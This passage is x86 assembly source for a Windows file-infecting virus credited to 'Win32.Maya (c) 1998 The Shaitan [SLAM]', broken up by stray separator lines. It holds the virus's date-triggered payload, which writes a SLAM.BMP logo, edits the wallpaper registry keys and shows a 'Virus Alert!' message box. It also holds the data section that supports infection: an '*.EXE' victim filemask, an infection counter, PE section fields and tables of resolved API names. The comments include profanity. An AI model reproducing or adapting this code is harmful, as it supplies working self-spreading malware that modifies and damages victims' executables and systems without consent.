maya_payload: ;@1701
|
||
|
;
|
||
|
;on the 1st of any month,creates a slam.bmp file containing a SLAM logo
|
||
|
;and sets the wallpaper to it.Then displays a messagebox.
|
||
|
;
|
||
|
call maya_getsystime ;fill system time structure
|
||
|
cmp word ptr[ebp+offset maya_systime.wday],1 ;1st of any month?
|
||
|
jne maya_payload_return ;nope abort
|
||
|
mov eax,offset maya_user32 ;ptr to 'USER32.dll' string
|
||
|
add eax,ebp ;add delta offset
|
||
|
call maya_getmodhand ;get hModule to user32
|
||
|
cmp eax,0 ;failed?
|
||
|
je maya_payload_return ;yes abort
|
||
|
mov [ebp+offset maya_u32hand],eax ;store hModule to user32
|
||
|
mov eax,offset maya_advapi32 ;ptr to 'ADVAPI32.dll' string
|
||
|
add eax,ebp ;add delta offset
|
||
|
call maya_getmodhand ;get hModule
|
||
|
cmp eax,0 ;failed?
|
||
|
je maya_payload_return ;yes abort
|
||
|
mov [ebp+offset maya_a32hand],eax ;store hModule
|
||
|
mov edx,offset maya_regopenkeyexa ;get ptr
|
||
|
add edx,ebp ;add delta offset
|
||
|
mov eax,[ebp+offset maya_a32hand] ;get handle to advapi32
|
||
|
call maya_getprocadd ;get add of RegOpenKeyExA fn
|
||
|
cmp eax,0 ;failed?
|
||
|
je maya_payload_return ;yes abort
|
||
|
mov [ebp+offset maya_regopenkeyexa_add],eax ;store add
|
||
|
;
|
||
|
;now gets the address of 3 more fn's:RegSetVauleExA,MessageBoxA,
|
||
|
;and SystemParametersInfo.It is identical to the method above,
|
||
|
;so i dont waste time commenting it
|
||
|
;
|
||
|
mov edx,offset maya_regsetvalueexa ;asciiz of fn
|
||
|
add edx,ebp
|
||
|
mov eax,[ebp+offset maya_a32hand]
|
||
|
call maya_getprocadd
|
||
|
cmp eax,0
|
||
|
je maya_payload_return
|
||
|
mov [ebp+offset maya_regsetvalueexa_add],eax ;store add
|
||
|
mov edx,offset maya_messageboxa ;asciiz of fn
|
||
|
add edx,ebp
|
||
|
mov eax,[ebp+offset maya_u32hand]
|
||
|
call maya_getprocadd
|
||
|
cmp eax,0
|
||
|
je maya_payload_return
|
||
|
mov [ebp+offset maya_messageboxa_add],eax ;store add
|
||
|
mov edx,offset maya_sysparam
|
||
|
add edx,ebp ;add delta offset
|
||
|
mov eax,[ebp+offset maya_u32hand] ;get handle to user32.dll
|
||
|
call maya_getprocadd ;call fn
|
||
|
cmp eax,0 ;failed?
|
||
|
je maya_payload_return ;yes abort
|
||
|
;
|
||
|
;creates the .bmp file
|
||
|
;
|
||
|
mov [ebp+offset maya_sysparam_add],eax
|
||
|
push 0 ;hTemplate is null
|
||
|
push 80h ;attribute normal
|
||
|
push 2 ;create always,overwrite if exists
|
||
|
push 0 ;no security attrs struct,so we pass null
|
||
|
push 1 ;share_read
|
||
|
push 40000000h ;generic write access
|
||
|
mov eax,offset maya_slamfilename;ptr to filename
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;ptr to filename
|
||
|
mov eax,[ebp+offset maya_createfilea_add];get fn add
|
||
|
call eax ;call CreateFileA()
|
||
|
cmp eax,-1 ;failed?
|
||
|
je maya_payload_return ;yes abort
|
||
|
mov [ebp+offset maya_slamhandle],eax ;store handle
|
||
|
push 0 ;null as overlapped ptr to WriteFile
|
||
|
mov eax,offset maya_numberofwritten ;add of room
|
||
|
;for # of written bytes
|
||
|
add eax,ebp ;plus delta offset
|
||
|
push eax ;store parameter
|
||
|
push dword ptr slam_len ;length of .bmp
|
||
|
mov eax,offset slam ;ptr to .bmp
|
||
|
add eax,ebp ;plus delta offset
|
||
|
push eax ;store parameter
|
||
|
push dword ptr [ebp+offset maya_slamhandle] ;store handle for WriteFile
|
||
|
mov eax,[ebp+offset maya_writefile_add] ;get add of fn
|
||
|
call eax ;call fn
|
||
|
push dword ptr[ebp+offset maya_slamhandle];push handle
|
||
|
mov eax,[ebp+offset maya_closehandle_add];get fn add
|
||
|
call eax ;call fn
|
||
|
;
|
||
|
;registry manipulations to modify wallpaper
|
||
|
;
|
||
|
mov eax,offset maya_reg ;address of result
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;pass param
|
||
|
push 2 ;desired access:KEY_SET_VALUE
|
||
|
push 0 ;reserved,must be null
|
||
|
mov eax,offset maya_cpd ;ptr to 'Control Panel\Desktop'
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;pass param
|
||
|
push 80000001h ;HKEY_CURRENT_USER
|
||
|
mov eax,[ebp+offset maya_regopenkeyexa_add];get fn address
|
||
|
call eax ;call RegOpenKeyExA
|
||
|
push 2 ;size of value data
|
||
|
mov eax,offset maya_one ;'1' character
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;pass param
|
||
|
push 1 ;type of data:1=zero terminated
|
||
|
;string
|
||
|
push 0 ;reserved,must be null
|
||
|
mov eax,offset maya_tilewallpaper ;ptr to 'Tilewallpaper'
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;value name to set
|
||
|
push dword ptr [ebp+offset maya_reg] ;hKey
|
||
|
mov eax,[ebp+offset maya_regsetvalueexa_add]
|
||
|
call eax ;call fn
|
||
|
push 2 ;size of value data
|
||
|
mov eax,offset maya_zero ;'0' character
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;pass param
|
||
|
push 1 ;data type
|
||
|
push 0 ;reserved
|
||
|
mov eax,offset maya_wallpaperstyle ;ptr to value name
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;pass param
|
||
|
push dword ptr[ebp+offset maya_reg] ;hKey
|
||
|
mov eax,[ebp+offset maya_regsetvalueexa_add];get fn add
|
||
|
call eax ;call fn
|
||
|
push 0
|
||
|
mov eax,offset maya_slamfilename ;file containing .bmp
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;pass param
|
||
|
push 0
|
||
|
push 14h ;SPI_SETDESKWALLPAPER
|
||
|
mov eax,[ebp+offset maya_sysparam_add] ;get fn add
|
||
|
call eax ;call fn:update desktop
|
||
|
;
|
||
|
;messagebox
|
||
|
;
|
||
|
push 30h ;MB_OK+MB_ICONEXCLAMATION style
|
||
|
mov eax,offset maya_viralert ;title of msgbox
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;pass param
|
||
|
mov eax,offset maya_mayamsg ;ptr to msg of msgbox
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;pass param
|
||
|
push 0 ;hWnd of caller (virus)
|
||
|
mov eax,[ebp+offset maya_messageboxa_add] ;get fn add
|
||
|
call eax ;call MessageBox fn
|
||
|
maya_payload_return:
|
||
|
ret ;return to caller
|
||
|
;
|
||
|
;data related to virus
|
||
|
;
|
||
|
|
||
|
maya_msg db 'To Aparna S. : Forever in love with you...'
|
||
|
;
|
||
|
;fuck all the motherfucking bitches
|
||
|
;
|
||
|
|
||
|
maya_addof_k32 dd 0 ;address of KERNEL32.dll module
|
||
|
maya_imagebase dd 0 ;imagebase of host @18FC
|
||
|
maya_windir db 128 dup(0) ;room for Windows directory ASCIIZ string @1900
|
||
|
maya_currdir db 128 dup (0) ;room for current directory ASCIIZ string @1980
|
||
|
maya_systime win32systime ;win32 system time structure @1A00
|
||
|
maya_finddata _find_data ;finddata structure for file searches @1A10
|
||
|
|
||
|
|
||
|
maya_fileattrib dd 0 ;attribute of victim @1B58
|
||
|
maya_successfull_infection dd 0 ;flag that indicates the infection
|
||
|
;routines completed operation @1B5C
|
||
|
maya_infection_counter dd 0 ;counter of infections @1B60
|
||
|
maya_eat dd 0 ;export address table
|
||
|
maya_expnames dd 0 ;exported names
|
||
|
maya_eord dd 0 ;exports ordinals
|
||
|
maya_ilt dd 0 ;import lookup table rva
|
||
|
|
||
|
|
||
|
maya_findhandle dd 0 ;handle used in file searches
|
||
|
maya_filemask db '*.EXE',0 ;filemask used to find victims @1B51
|
||
|
|
||
|
maya_filesize_high_dword dd 0 ;hi dword of filesize @1B74
|
||
|
maya_filesize dd 0 ;lo dword of filesize @1B78
|
||
|
maya_handle dd 0 ;handle of file being infected @1B7C
|
||
|
maya_maphandle dd 0 ;handle of filemapping object @1B80
|
||
|
maya_mappedadd dd 0 ;address where file is mapped @1B84
|
||
|
maya_peptr dd 0 ;PE head ptr @1B88
|
||
|
maya_ptrtolastsection dd 0 ;ptr to last entry in section table @1B8C
|
||
|
maya_filealign dd 0 ;file alignment unit size @1B90
|
||
|
maya_entry_of_host dd 3000h ;host entry rva @1B94
|
||
|
; yikes--hardcoded for 1st generation:)
|
||
|
|
||
|
maya_sectrva dd 0 ;rva of viral section @1B98
|
||
|
maya_olderva dd 0 ;temporary storage of host entry point @1B9C
|
||
|
maya_sectps dd 0 ;PhysSize of last section @1BA0
|
||
|
maya_k32 db 'KERNEL32.dll',0 ;@1BA4
|
||
|
;
|
||
|
;api names
|
||
|
;
|
||
|
maya_getmodulehandlea_len dd 17 ;@1BB1
|
||
|
maya_getmodulehandlea db 'GetModuleHandleA',0
|
||
|
maya_getmodulehandlea_add dd 0
|
||
|
|
||
|
maya_getprocaddress_len dd 15
|
||
|
maya_getprocaddress db 'GetProcAddress',0
|
||
|
maya_getprocaddress_add dd 0
|
||
|
|
||
|
maya_createfilea_len dd 12
|
||
|
maya_createfilea db 'CreateFileA',0
|
||
|
maya_createfilea_add dd 0
|
||
|
|
||
|
maya_writefile_len dd 10
|
||
|
maya_writefile db 'WriteFile',0
|
||
|
maya_writefile_add dd 0
|
||
|
|
||
|
maya_getfilesize_len dd 12
|
||
|
maya_getfilesize db 'GetFileSize',0
|
||
|
maya_getfilesize_add dd 0
|
||
|
|
||
|
maya_createfilemappinga_len dd 19
|
||
|
maya_createfilemappinga db 'CreateFileMappingA',0
|
||
|
maya_createfilemappinga_add dd 0
|
||
|
|
||
|
maya_mapviewoffile_len dd 14
|
||
|
maya_mapviewoffile db 'MapViewOfFile',0
|
||
|
maya_mapviewoffile_add dd 0
|
||
|
|
||
|
maya_unmapviewoffile_len dd 16
|
||
|
maya_unmapviewoffile db 'UnmapViewOfFile',0
|
||
|
maya_unmapviewoffile_add dd 0
|
||
|
|
||
|
maya_closehandle_len dd 12
|
||
|
maya_closehandle db 'CloseHandle',0
|
||
|
maya_closehandle_add dd 0
|
||
|
|
||
|
maya_findfirstfilea_len dd 15
|
||
|
maya_findfirstfilea db 'FindFirstFileA',0
|
||
|
maya_findfirstfilea_add dd 0
|
||
|
|
||
|
maya_findnextfilea_len dd 14
|
||
|
maya_findnextfilea db 'FindNextFileA',0
|
||
|
maya_findnextfilea_add dd 0
|
||
|
|
||
|
maya_findclose_len dd 10
|
||
|
maya_findclose db 'FindClose',0
|
||
|
maya_findclose_add dd 0
|
||
|
|
||
|
maya_setfilepointer_len dd 15
|
||
|
maya_setfilepointer db 'SetFilePointer',0
|
||
|
maya_setfilepointer_add dd 0
|
||
|
|
||
|
maya_setendoffile_len dd 13
|
||
|
maya_setendoffile db 'SetEndOfFile',0
|
||
|
maya_setendoffile_add dd 0
|
||
|
|
||
|
maya_getcurrentdirectorya_len dd 15h
|
||
|
maya_getcurrentdirectorya db 'GetCurrentDirectoryA',0
|
||
|
maya_getcurrentdirectorya_add dd 0
|
||
|
|
||
|
maya_setcurrentdirectorya_len dd 15h
|
||
|
maya_setcurrentdirectorya db 'SetCurrentDirectoryA',0
|
||
|
maya_setcurrentdirectorya_add dd 0
|
||
|
|
||
|
maya_getfileattributesa_len dd 13h
|
||
|
maya_getfileattributesa db 'GetFileAttributesA',0
|
||
|
maya_getfileattributesa_add dd 0
|
||
|
|
||
|
maya_setfileattributesa_len dd 13h
|
||
|
maya_setfileattributesa db 'SetFileAttributesA',0
|
||
|
maya_setfileattributesa_add dd 0
|
||
|
|
||
|
maya_getsystemtime_len dd 14
|
||
|
maya_getsystemtime db 'GetSystemTime',0
|
||
|
maya_getsystemtime_add dd 0
|
||
|
|
||
|
maya_getwindowsdirectorya_len dd 15h
|
||
|
maya_getwindowsdirectorya db 'GetWindowsDirectoryA',0
|
||
|
maya_getwindowsdirectorya_add dd 0
|
||
|
|
||
|
maya_maya dd 'MAYA' ;endmarker
|
||
|
|
||
|
maya_movefilea_len dd 10
|
||
|
maya_movefilea db 'MoveFileA',0
|
||
|
maya_movefilea_add dd 0
|
||
|
dd offset maya_deadcode_call1
|
||
|
|
||
|
maya_copyfilea_len dd 10
|
||
|
maya_copyfilea db 'CopyFileA',0
|
||
|
maya_copyfilea_add dd 0
|
||
|
dd offset maya_deadcode_call2
|
||
|
|
||
|
maya_createfilea2_len dd 12
|
||
|
maya_createfilea2 db 'CreateFileA',0
|
||
|
maya_createfilea2_add dd 0
|
||
|
dd offset maya_deadcode_call3
|
||
|
|
||
|
maya_deletefilea_len dd 12
|
||
|
maya_deletefilea db 'DeleteFileA',0
|
||
|
maya_deletefilea_add dd 0
|
||
|
dd offset maya_deadcode_call4
|
||
|
|
||
|
maya_setfileattributesa2_len dd 13h
|
||
|
maya_setfileattributesa2 db 'SetFileAttributesA',0
|
||
|
maya_setfileattributesa2_add dd 0
|
||
|
dd offset maya_deadcode_call5
|
||
|
|
||
|
maya_getfileattributesa2_len dd 13h
|
||
|
maya_getfileattributesa2 db 'GetFileAttributesA',0
|
||
|
maya_getfileattributesa2_add dd 0
|
||
|
dd offset maya_deadcode_call6
|
||
|
|
||
|
maya_getfullpathnamea_len dd 11h
|
||
|
maya_getfullpathnamea db 'GetFullPathNameA',0
|
||
|
maya_getfullpathnamea_add dd 0
|
||
|
dd offset maya_deadcode_call7
|
||
|
|
||
|
maya_createprocessa_len dd 15
|
||
|
maya_createprocessa db 'CreateProcessA',0
|
||
|
maya_createprocessa_add dd 0
|
||
|
dd offset maya_deadcode_call8
|
||
|
|
||
|
maya_shai dd 'SHAI' ;endmarker
|
||
|
|
||
|
;
|
||
|
;payload stuff
|
||
|
;
|
||
|
|
||
|
maya_cpd db 'Control Panel\Desktop',0
|
||
|
maya_reg dd 0 ;@1E76
|
||
|
maya_one db '1',0 ;@1E7A
|
||
|
maya_zero db '0',0 ;@1E7C
|
||
|
maya_tilewallpaper db 'TileWallpaper',0 ;@1E7E
|
||
|
maya_wallpaperstyle db 'WallpaperStyle',0
|
||
|
maya_slamfilename db 'SLAM.BMP',0 ;@1E9B
|
||
|
maya_slamhandle dd 0 ;handle of created SLAM.BMP @1EA4
|
||
|
maya_numberofwritten dd 0 ;paramter of WriteFile
|
||
|
maya_mayamsg db 'Win32.Maya (c) 1998 The Shaitan [SLAM]',0
|
||
|
maya_viralert db 'Virus Alert!',0
|
||
|
maya_user32 db 'USER32.dll',0 ;@1EE0
|
||
|
maya_advapi32 db 'ADVAPI32.dll',0 ;@1EEB
|
||
|
maya_u32hand dd 0 ;handle to user32 @1EF8
|
||
|
maya_a32hand dd 0 ;handle to advapi32 @1EFC
|
||
|
maya_dd5 dd 0 ;???? @1F00
|
||
|
maya_regopenkeyexa db 'RegOpenKeyExA',0 ;@1F04
|
||
|
maya_regsetvalueexa db 'RegSetValueExA',0 ;
|
||
|
maya_messageboxa db 'MessageBoxA',0 ;
|
||
|
maya_sysparam db 'SystemParametersInfoA',0
|
||
|
maya_regopenkeyexa_add dd 0 ;add of fn @1F43
|
||
|
maya_regsetvalueexa_add dd 0 ;add of fn @1F47
|
||
|
maya_messageboxa_add dd 0 ;add of fn @1F4B
|
||
|
maya_sysparam_add dd 0 ;add of fn @1F4F
|
||
|
;
|
||
|
;the 'SLAM' logo stored in bitmap file format
|
||
|
;
|
||
|
slam_len equ 230 ;@1F53
|
||
|
slam db 66, 77,230, 0, 0, 0, 0, 0, 0, 0, 62, 0, 0, 0, 40, 0, 0, 0, 60
|
||
|
db 0, 0, 0, 21, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0,168, 0, 0, 0
|
||
|
db 196, 14, 0, 0,196, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
|
||
|
db 0,255,255,255, 0,255,255,255,255,255,255,255,240,255,255,255,255,255,255
|
||
|
db 255,240,255,255,255,255,255,255,255,240,255,255,255,255,255,255,255,240,224
|
||
|
db 2, 0,131,226, 14, 60,112,224, 2, 0,131,226, 14, 60,112,227,130, 15,131
|
||
|
db 226, 14, 60,112,227,130, 15,131,226, 14, 60,112,227,130, 15,128, 2, 14, 60
|
||
|
db 112,255,130, 15,128, 2, 14, 60,112,224, 2, 31,195,134, 30, 60,112,224, 2
|
||
|
db 63,227,142, 62, 60,112,227,254, 63,227,142, 62, 60,112,227,226, 63,227,142
|
||
|
db 62, 60,112,227,226, 63,227,142, 62, 60,112,227,226, 63,227,142, 62, 60,112
|
||
|
db 224, 2, 63,224, 14, 0, 0,112,224, 2, 63,224, 14, 0, 0,112,255,255,255
|
||
|
db 255,255,255,255,240,255,255,255,255,255,255,255,240,255,255,255,255,255,255
|
||
|
db 255,240
|
||
|
|
||
|
maya_end equ $
|
||
|
|
||
|
.data
|
||
|
host:
|
||
|
push 0
|
||
|
call ExitProcess
|
||
|
|
||
|
|
||
|
end maya
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|